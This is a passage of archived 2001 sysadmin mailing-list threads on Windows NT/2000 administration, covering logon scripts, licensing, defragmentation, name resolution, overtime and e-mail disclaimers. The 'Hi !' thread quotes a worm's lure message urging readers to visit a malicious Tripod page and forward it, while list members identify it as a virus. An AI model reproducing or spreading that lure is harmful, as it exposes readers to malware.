Title: RE: windows 2000 login script entry usermanager allows you to select everyone via the control key I think. -Original Message- From: Paul Green [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:31 PM To: NT System Admin Issues Subject: windows 2000 login script entry Anyone know how to do a batch edit of all users? I need to change everyone's login script to login.bat. I have about 150 users to change. I'm using Windows 2000 Server with AD. Thanks, Paul _ Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (www.grisoft.com). Version: 6.0.274 / Virus Database: 144 - Release Date: 8/23/2001 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: windows 2000 login script entry
Title: RE: windows 2000 login script entry Now that I look at the subject again, I realize that my answer (albeit not as detailed as yours) works for NT. Guess it's the same for w2k too? -Original Message-From: xylog [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 30, 2001 2:28 PMTo: NT System Admin IssuesSubject: Re: windows 2000 login script entry More to the point after selecting mulitple users via control and shift keys User Manager allows you to alter certain properties for all selected users and one of these properties happens to be the logon script setting. xylog - Original Message - From: [EMAIL PROTECTED] To: NT System Admin Issues Sent: Thursday, August 30, 2001 4:49 PM Subject: RE: windows 2000 login script entry usermanager allows you to select everyone via the control key I think. -Original Message- From: Paul Green [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 30, 2001 1:31 PM To: NT System Admin Issues Subject: windows 2000 login script entry Anyone know how to do a batch edit of all users? I need to change everyone's login script to login.bat. I have about 150 users to change. I'm using Windows 2000 Server with AD. Thanks, Paul _ Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (www.grisoft.com). Version: 6.0.274 / Virus Database: 144 - Release Date: 8/23/2001 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: License manager
Title: Message Don't sweat it. How do you think we learned? -Original Message-From: Mal Sasalu [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 9:36 AMTo: NT System Admin IssuesSubject: RE: License manager ok ok ok guys. Thanks. Dumbs like me still exists, who prefer Rum or Whisky over Beer. Thanks everyone for your input. -Original Message-From: Martin Blackstone [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 10:16 AMTo: NT System Admin IssuesSubject: RE: License manager How Martin installs NT: 1) Install W2K instead 2) Disable License Logging Service 3) Apply latest sp. 4) Eat fish tacos and drink beer -Original Message-From: Lefkovics, William [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 9:03 AMTo: NT System Admin IssuesSubject: RE: License manager How William installs NT: 1) Install NT 2) Disable License Logging Service 3) Apply latest sp. :o) -Original Message-From: Mal Sasalu [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 8:29 AMTo: NT System Admin IssuesSubject: FW: License manager Hi All I am sorry if this turns out to be a long question. I have joined new in this company. We have some wiered problems with licensing.The domain controller (which is also our exchange)license manager shows like this product per seat purchased per seat alocated per server purchased per server reached Microsoft exchange 5.5 0 0 0 0 Microsoft exchange 5.5 0 0 0 0 Microsoft exchange 5.5 0 0 0 0 Microsoft exchange 5.5 0313 0 126 Microsoft SQL Server 0 565 220 574 I am failing to interpret this. We have around 130 people working here. Thanks Mal http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: OT E-Mail Disclaimers
Title: Message About as silly, andtherefore has probably been used, as the hacker argument that says "well, their system doesn't say "No unauthorized personnel", it says "Welcome". -Original Message-From: Sean Martin [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 9:39 AMTo: NT System Admin IssuesSubject: RE: OT E-Mail Disclaimers I agree with the majority on this one. Disclaimers are pretty obnoxious.Yet I was asked to implement one.However, I don't think the reason for most organizations using disclaimers it to completely cover their a$$ in a legal situation. I would imagine it's just one more thing an organization can do to help. There are so many loopholes out there that everyone has to be sure to cover all bases. If one didn't have a disclaimer, a defending attorney would probably use that fact in their argument..."My client was unaware that the plans for the next neutron bomb were confidential and not to be forwarded to friends and family overseas." Just my .02 Regards, Sean Martin, MCSENetwork AdministratorRibelin Lowell CompanyInsurance Brokers, Inc.3111 C Street, Suite 300Anchorage, Alaska 99503Ph: (907) 561-1250Fax: (907) 561-4315Cell: (907) 229-0885Email: [EMAIL PROTECTED] -Original Message-From: Blake R. Fowkes [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 8:16 AMTo: NT System Admin IssuesSubject: RE: OT E-Mail Disclaimers We have everyone put the following disclaimer on anything that is not personal. It is what our legal department came up with. CONFIDENTIALITY NOTICE The information contained in this electronic mail is strictly confidential, attorney work product; or subject to the Attorney-Client Privilege. This transmission is intended only for the addressee(s) named. You are hereby notified that any use, disclosure, dissemination, distribution, copying, or taking of any action because of this information by any party other than the addressee(s), is strictly prohibited. If you have received this transmission in error, please notify the sender by email, or call (512) 255- immediately. Thanks, Blake Fowkes Waid and Associates -Original Message-From: Banyas, Pat F. Civ [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 11:21 AMTo: NT System Admin IssuesSubject: RE: OT E-Mail Disclaimers Thanks to all who replied. We are reviewing this topic since users are allowed to send and receive personal mail as well as Official mail due to our remote location. While it may have no legal standpoint at this time, it does make the point to those who receive it that the disclaimer is drawing their attention to something they should be aware of. I realize no one likes them, I was just looking for some examples since I have seen quite a few at the bottom of emails sent to this list. Thanks Pat Banyas -Original Message-From: Waters, Jeff [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 11:08 AMTo: NT System Admin IssuesSubject: RE: OT E-Mail Disclaimers They are just plain evil, I would highly recommend going over to the Exchange list and asking the question. Just put on your flame suit first. Jeff -Original Message-From: Erik Sojka [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 11:03 AMTo: NT System Admin IssuesSubject: RE: OT E-Mail Disclaimers We should discuss this on the Swynk Exchange list (ls.swynk.com) They love discussing email disclaimers and do it quite often. -Original Message-From: Correa, Andre [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 11:03 AMTo: NT System Admin IssuesSubject: RE: OT E-Mail Disclaimers Do they serve some legal purpose? -Original Message-From: Kelly Borndale [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 10:45 AMTo: NT System Admin IssuesSubject: Re: OT E-Mail Disclaimers They are annoying, and they mean little to nothing. K.Borndale [EMAIL PROTECTED] -home email - Original Message - From: Banyas, Pat F. Civ To: NT System Admin Issues Sent: Wednesday, August 29, 2001 10:33 AM Subject: OT E-Mail Disclaimers
RE: Desktop icons not responding
how about just rebooting? -Original Message-From: Steve More [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 12:38 PMTo: NT System Admin IssuesSubject: RE: Desktop icons not responding Check to see if Explorer.exe is running, if not someone is playing with you. -Original Message-From: Myung Bang [mailto:[EMAIL PROTECTED]]Sent: Wednesday, August 29, 2001 12:36 PMTo: NT System Admin IssuesSubject: Re: Desktop icons not respondingWell, I can not delete any icons on the desktop. Delete key doesn't work. I brought up the Display Properties and only odd thing I can see is, Background Pattern is empty and Edit Pattern button is gray out. All other seems ok. Maybe this Background Pattern has something to do with my problem. "Rogers, Jeff L (OM)" wrote: that's why I suggested checking to see what the desktop properties were, what background, wallpaper, etc. -Original Message- From: Mal Sasalu [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 14:13 To: NT System Admin Issues Subject: RE: Desktop icons not responding Sounds like you have been tricked. Did someone pasted a desk top screen shot on your machine??. Try click and hit delete. Mal -Original Message- From: Myung Bang [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 1:07 PM To: NT System Admin Issues Subject: Re: Desktop icons not responding Event log doesn't tell me anything. No error messages. Mouse does not function on the desktop at all, so, right mouse click on the desktop doesn't do anything. But if I open any application, it will work within those applications Sean Martin wrote: Sounds like a problem I was having with our Exchange server awhile back due to low virtual memory. What does the event log tell you? Our problem was related to GroupShield, so I uninstalled it and replaced with Antigen :o)Regards,Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] -Original Message- From: Rogers, Jeff L (OM) [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 10:36 AM To: NT System Admin Issues Subject: RE: Desktop icons not responding Interesting. Just for grins: what happens when you right-click the "desktop?" What is the wallpaper or background right now? -Original Message- From: Myung Bang [mailto:[EMAIL PROTECTED]] Sent: Wednesday, August 29, 2001 13:31 To: NT System Admin Issues Subject: Desktop icons not responding Hello, I am having an interesting problem on NT 4.0 SP6a machine. I can not click icons on the desktop using the mouse. I can tap trough using keyboard and access them, but mouse click doesn't work. I can, however, use mouse clicks on Start menus. Mouse click just would not work on desktop icons. Also, it won't work on newly created icons, neither. Anyone seen this behavior before?? Thanks. Myung http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm -- ** Email: [EMAIL PROTECTED] Phone: (757) 269-7158 Fax: (757) 269-7053 Pager: (757) 888-7561 ** http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Domain Admin cannot use admin tools
Title: RE: Domain Admin cannot use admin tools Have you rebooted yet? -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 6:57 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Thanks agin. No, system error 5 (access denied) is returned. I'm stumped! [EMAIL PROTECTED] 08/28/01 09:41AM Can you add a dummy user from the command line using NET USER command? -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 14:40 To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Thanks for the reply. No, we have a single domain, no trusts. Netlogon is running fine. Nothing in the event logs pertinent to the problem. [EMAIL PROTECTED] 08/28/01 09:19AM trusts? have your account permissions been revoked in the trusted domain? contact those administrators and verify membership? i get the message but i am no longer an account op in the trusted domain... === Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] === -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:55 AM To: NT System Admin Issues Subject: Domain Admin cannot use admin tools Strange thing started happening last week. All the domain administrators have lost the capability of using usrmgr.exe and srvmgr.exe! They come up, but any attempt to make changes gets ACCESS DENIED. All accounts are still domain admins, and all rights remain unchanged. Checked for viruses and resynched, but no change. We are running Novell Account manager in parallel, but nothing has changed with it either, although I am most suspicious of this as the cause, but I need to cover all the bases. Has anyone seen this before? Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Domain Admin cannot use admin tools
Title: RE: Domain Admin cannot use admin tools Frustrated screenwriter? Nice to know some things never change - when in doubt - reboot. -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 7:56 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Ok gang. Thanks for all the help both on and off list. The answer had to be in the Netlogon service, according to Novell. I tried to reboot the PDC, but was told I had no rights to do so. AHA you scoundrel, says I. I'll show you who's in charge here!. Warily pressing the Big Red Button, the administrator jumps quickly backward, allowing the defiant machine to die gracefully. Rise and Heal thyself! I yelled. Slowly, the beast began to stir, eventually coming to full life and, having been beaten into submission, was henceforth properly responsive to all demands made of it. Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 [EMAIL PROTECTED] 08/28/01 09:57AM Thanks agin. No, system error 5 (access denied) is returned. I'm stumped! [EMAIL PROTECTED] 08/28/01 09:41AM Can you add a dummy user from the command line using NET USER command? -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 14:40 To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Thanks for the reply. No, we have a single domain, no trusts. Netlogon is running fine. Nothing in the event logs pertinent to the problem. [EMAIL PROTECTED] 08/28/01 09:19AM trusts? have your account permissions been revoked in the trusted domain? contact those administrators and verify membership? i get the message but i am no longer an account op in the trusted domain... === Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] === -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:55 AM To: NT System Admin Issues Subject: Domain Admin cannot use admin tools Strange thing started happening last week. All the domain administrators have lost the capability of using usrmgr.exe and srvmgr.exe! They come up, but any attempt to make changes gets ACCESS DENIED. All accounts are still domain admins, and all rights remain unchanged. Checked for viruses and resynched, but no change. We are running Novell Account manager in parallel, but nothing has changed with it either, although I am most suspicious of this as the cause, but I need to cover all the bases. Has anyone seen this before? Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Domain Admin cannot use admin tools
Title: RE: Domain Admin cannot use admin tools yuk. good luck -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:25 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Yeah. Lost my head. It's just one of those days. They just laid off 288 out of 700 people, and two days later they announce ANOTHER 300 million dollar deficit, which will require another 5-7% layoff. So much for government jobs being secure! I just had to do something out of the ordinary to vent! [EMAIL PROTECTED] 08/28/01 11:06AM Frustrated screenwriter? Nice to know some things never change - when in doubt - reboot. -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 7:56 AM To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Ok gang. Thanks for all the help both on and off list. The answer had to be in the Netlogon service, according to Novell. I tried to reboot the PDC, but was told I had no rights to do so. AHA you scoundrel, says I. I'll show you who's in charge here!. Warily pressing the Big Red Button, the administrator jumps quickly backward, allowing the defiant machine to die gracefully. Rise and Heal thyself! I yelled. Slowly, the beast began to stir, eventually coming to full life and, having been beaten into submission, was henceforth properly responsive to all demands made of it. Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 [EMAIL PROTECTED] 08/28/01 09:57AM Thanks agin. No, system error 5 (access denied) is returned. I'm stumped! [EMAIL PROTECTED] 08/28/01 09:41AM Can you add a dummy user from the command line using NET USER command? -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, 28 August 2001 14:40 To: NT System Admin Issues Subject: RE: Domain Admin cannot use admin tools Thanks for the reply. No, we have a single domain, no trusts. Netlogon is running fine. Nothing in the event logs pertinent to the problem. [EMAIL PROTECTED] 08/28/01 09:19AM trusts? have your account permissions been revoked in the trusted domain? contact those administrators and verify membership? i get the message but i am no longer an account op in the trusted domain... === Lerone Streeter System Analyst Abbott LBG [EMAIL PROTECTED] === -Original Message- From: Steve Kelsay [mailto:[EMAIL PROTECTED]] Sent: Tuesday, August 28, 2001 8:55 AM To: NT System Admin Issues Subject: Domain Admin cannot use admin tools Strange thing started happening last week. All the domain administrators have lost the capability of using usrmgr.exe and srvmgr.exe! They come up, but any attempt to make changes gets ACCESS DENIED. All accounts are still domain admins, and all rights remain unchanged. Checked for viruses and resynched, but no change. We are running Novell Account manager in parallel, but nothing has changed with it either, although I am most suspicious of this as the cause, but I need to cover all the bases. Has anyone seen this before? Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: RE: Defrag: is it necessary for NTFS?
Title: RE: RE: Defrag: is it necessary for NTFS? I haven't as yet defragged my servers, which probably need it more than my desktops. But I can definitely tell when I log into a desktop that needs defragging. I can hear the drives churning. Desktops are all nt4 w/ ntfs. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 7:45 AM To: NT System Admin Issues Subject: Re:RE: Defrag: is it necessary for NTFS? I have exprienced slow data access from badly fragmented NTFS drives. I don't have any recent data nor do I have hard data from a test environment. I do know that after defragging my users' hard drives their computer response times more than doubled. IE it took less than half the previous time to open the same files. ralph Reply Separator Subject: RE: Defrag: is it necessary for NTFS? Author: NT System Admin Issues [EMAIL PROTECTED] Date: 08/27/2001 2:22 PM but when the drives get full, the whole systems bogs down and then to defrag can take forever and no one of the defrag tools do a good job when you have reached this point. So my humble opinion is to do it and do it frequently using Diskkeeper FragGaurd on all the time while there is lots of space to operate in. Erich -Original Message- From: Josu Lekaroz [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:16 PM To: NT System Admin Issues Subject: Re: Defrag: is it necessary for NTFS? Maybe the benefits exist but I have never had to defrag a drive on NT. Perhaps someone has benchmarked drives before an after defragmentation. It'd be nice to see results. Regards josu http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: What do you get for Over Time
Title: RE: What do you get for Over Time I think there's a whole bunch of exceptions, and unfortunately for many of us, I think IT got to be an exception. Of course that may have been on the state level, although I could swear it was the National Labor Relations Board that audited our company at the time. -Original Message- From: Sean Martin [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 9:51 AM To: NT System Admin Issues Subject: RE: What do you get for Over Time I've been a salaried, non-exempt employee for the past 3 years and I've always gotten time and a half for any over-time I put in. However, our HR person recently contacted the Department of Labor and found out some interesting facts. Anyone who is not in a position where 2 or more people work directly under them, is considered a non-exempt employee (at least in our case). Regards, Sean Martin, MCSE Network Administrator Ribelin Lowell Company Insurance Brokers, Inc. 3111 C Street, Suite 300 Anchorage, Alaska 99503 Ph: (907) 561-1250 Fax: (907) 561-4315 Cell: (907) 229-0885 Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] -Original Message- From: Greg Page [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 8:29 AM To: NT System Admin Issues Subject: RE: What do you get for Over Time I didn't think you did, I was pointing out the math. Greg -Original Message- From: Seth M. Kusiak [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 12:17 PM To: NT System Admin Issues Subject: Re: What do you get for Over Time It was ONLY an example. I don't make 10K a year. Greg Page writes: If you made $10,000 a year that would be $5.00 and hour. I haven't had and overtime paying job in years but we've always managed to snag lots of extra time off when we can. The nature of the IT beast is that sometimes there is OT involved and long nights and weekends. Just part of the job. Greg -Original Message- From: Seth M. Kusiak [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 9:25 AM To: NT System Admin Issues Subject: Re: What do you get for Over Time I'm salaried, but if I work over 45 hours in a week then for each hour that I work past 45, I get half of my base rate. Example: If I make $10,000 a year and my hourly rate is $10.00, for each hour that I work past 45, I would get $5.00 an hour that is paid quarterly. I really like this because I usually end up with a few thousand extra each quarter. ~Seth Mathews, James E. writes: I was wondering if anyone has any policies set up for Over Time. The reason I ask is one of the other network guys and myself have put in about 40 hours over time this month and we receive nothing for it. Just wondering what policies are set up at other companies to compensate for over time. We consistently work about 8-12 hours over a month and we get no time off or anything for this. Management keeps telling us it is just part of our job and we can not get any comp time even though we are only scheduled for 40 hours a week. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm DO NOT read, copy or disseminate this communication unless you are the intended addressee. This e-mail communication contains confidential and/or privileged information intended only for the addressee. If you have received this communication in error, please call us immediately at (907) 561-1250 and ask to speak to the sender of the communication. Also, please e-mail the sender and notify the sender immediately that you have received the communication in error. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hi !
Title: RE: Hi ! Hey Roger - is this it? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi ! Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hi !
Title: Message Does it have a name yet? -Original Message-From: Don Ely [mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 2:17 PMTo: NT System Admin IssuesSubject: RE: Hi ! Yes, this is the one -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:13 PMTo: NT System Admin IssuesSubject: RE: Hi ! Hey Roger - is this it? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi ! Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hi !
Title: Message thanks -Original Message-From: Bill Higgins [mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 2:27 PMTo: NT System Admin IssuesSubject: RE: Hi ! According to TrendMicro... VBS_LODIN.A http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=VBS_LODING.A -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 14:25To: NT System Admin IssuesSubject: RE: Hi ! Does it have a name yet? -Original Message-From: Don Ely [mailto:[EMAIL PROTECTED]]Sent: Monday, August 27, 2001 2:17 PMTo: NT System Admin IssuesSubject: RE: Hi ! Yes, this is the one -Original Message-From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:13 PMTo: NT System Admin IssuesSubject: RE: Hi ! Hey Roger - is this it? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 2:08 PM To: NT System Admin Issues Subject: Hi ! Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Hi !
Title: RE: Hi ! yes I have. -Original Message- From: Stephen Berg [mailto:[EMAIL PROTECTED]] Sent: Monday, August 27, 2001 3:07 PM To: NT System Admin Issues Subject: Re: Hi ! Has anyone sent an email to Tripod.com to ask them to shut down that web page? On Mon, 27 Aug 2001 [EMAIL PROTECTED] wrote: Hi, how are you ? I am fine here. Please read the page http://pcControl.tripod.com/ to get some knowledge and prevent somebody hack you. Forword this mail to help all your friends too. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: NetBIOS name resolves to domain name
Title: RE: NetBIOS name resolves to domain name That's how my setup was, and when my internet connection failed I'd have problems. So now I have DNS set up internally too, even if it's only the 3rd option. -Original Message- From: Niki Blowfield [mailto:[EMAIL PROTECTED]] Sent: Friday, August 24, 2001 7:11 AM To: NT System Admin Issues Subject: RE: NetBIOS name resolves to domain name The domain that is being resolved, servername.co.uk, is not one of our servers We don't have any DNS servers on our LAN, we use our ISP's -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: 24 August 2001 14:36 To: NT System Admin Issues Subject: Re: NetBIOS name resolves to domain name Niki: The ping difference means that DNS (or the hosts file) is resolving the one server and WINS (lmhosts file) the other. For example, I have 2 servers (server01 and server02). I have a DNS namespace of div1.company.com. I have both valid WINS server(s) and DNS server(s). The 1st server, server01 is registered in DNS and the 2nd is not. My client is setup to use DNS to first resolve the name. When I ping server01, it replies server01.div1.company.com [192.168.100.50], when I ping server02 DNS does not have this host name so WINS ends up replying with server02 [192.168.100.55]. Either way should work and would not matter to Exchange. I would check to make sure both servers are properly registered in WINS. Go to the CMD prompt and type: NBTSTAT -a server01 (your server name goes here) You should get a listing at a minimum similar to this: NetBIOS Remote Machine Name Table Name Type Status -- SERVER02 00 UNIQUE Registered DOM01 00 GROUP Registered SERVER02 20 UNIQUE Registered MAC Address = 99-99-99-99-99-99 The first 00 is the unique computername registration by the workstation service. The other 00 group is the domain name registered saying that this computer is a member of this domain or workgroup. The 20 unique is registered by the server service I believe. You may certainly have other entries besides these, especially if the one server is the PDC. I would double check your WINS settings and make sure the servers are both registered properly in WINS. Whether the ping to a server is answered by WINS or DNS should not matter to the NetBIOS resolution for the Exchange server you are trying to add. Pinging any server in my organization will always give you a servername.div1.company.com answer to the ping. Thanks Niki Blowfield niki.blowfield@partit To: NT System Admin Issues ion.co.uk [EMAIL PROTECTED] cc: 08/24/2001 07:56 AM Subject: Netbios name resolves to domain name Please respond to NT System Admin Issues Hi We have an NT4 Domain, with one Exchange 5.5 server on the PDC. I have attempted to install another Exchange server into the site, but the installation fails at the end, with an error asking me to check if the directory service is started. The service is started, so upon investigation of technet, it mentions name resolution on the two servers. I have checked, and when I ping the server name of the server I'm trying to install, it resolves it to a domain name. e.g.; ping NEWEXCHSERVER pinging NEWEXCHSERVER.CO.UK [201.167.xxx.xxx] etc etc Whereas, if I ping the other way, it works okay. e.g. ping EXISTINGEXCSERVER pinging EXISTINGEXCSERVER [192.168.2.25] etc I have entered the new server into the lmhosts file of the exchange server and rebooted, but no difference. could this be the problem? if so, any ideas on a resolution Nik http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Scheduling a Defrag in 2000!
Title: RE: Scheduling a Defrag in 2000! I thought the guys at sysinternals had a way to do this. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Thursday, August 23, 2001 8:54 AM To: NT System Admin Issues Subject: Re: Scheduling a Defrag in 2000! There is no default way. You cannot schedule it in the task scheduler and you have to be a admin to run it. A couple solutions one go and Diskeeper or some other third pary app. Also I have found freeware called Autodefrag where you can through the task scheduler but the user will have to have admin priveleges. You can find autodefrag at www.morphasys.com. http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Access to Terminal Server
then go thruwww.sunbelt-software.com -Original Message-From: David N. Precht [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 10:34 AMTo: NT System Admin IssuesSubject: RE: Access to Terminal Server Would be nice to see , yet I get : The page cannot be displayed Gotta love it . -Original Message-From: Sullivan, Glenn [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 09:58To: NT System Admin IssuesSubject: RE: Access to Terminal Server Go to http://www.win2knews.com and sign up... Glenn Sullivan, MCSE+I MCDBA David Clark Company Inc. -Original Message-From: Correa, Andre [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 9:48 AMTo: NT System Admin IssuesSubject: RE: Access to Terminal Server I have been looking for that very piece of information. How do I sign up for the W2K news email letter? -Original Message-From: John Brozycki [mailto:[EMAIL PROTECTED]]Sent: Thursday, August 23, 2001 9:21 AMTo: NT System Admin IssuesSubject: RE: Access to Terminal Server If you get Stu's W2K news email newsletter he just sent one out this morning that had a snippet from Mark Minasi explaining how to do this very thing. Here's the quote from Mark Minasi: How to let 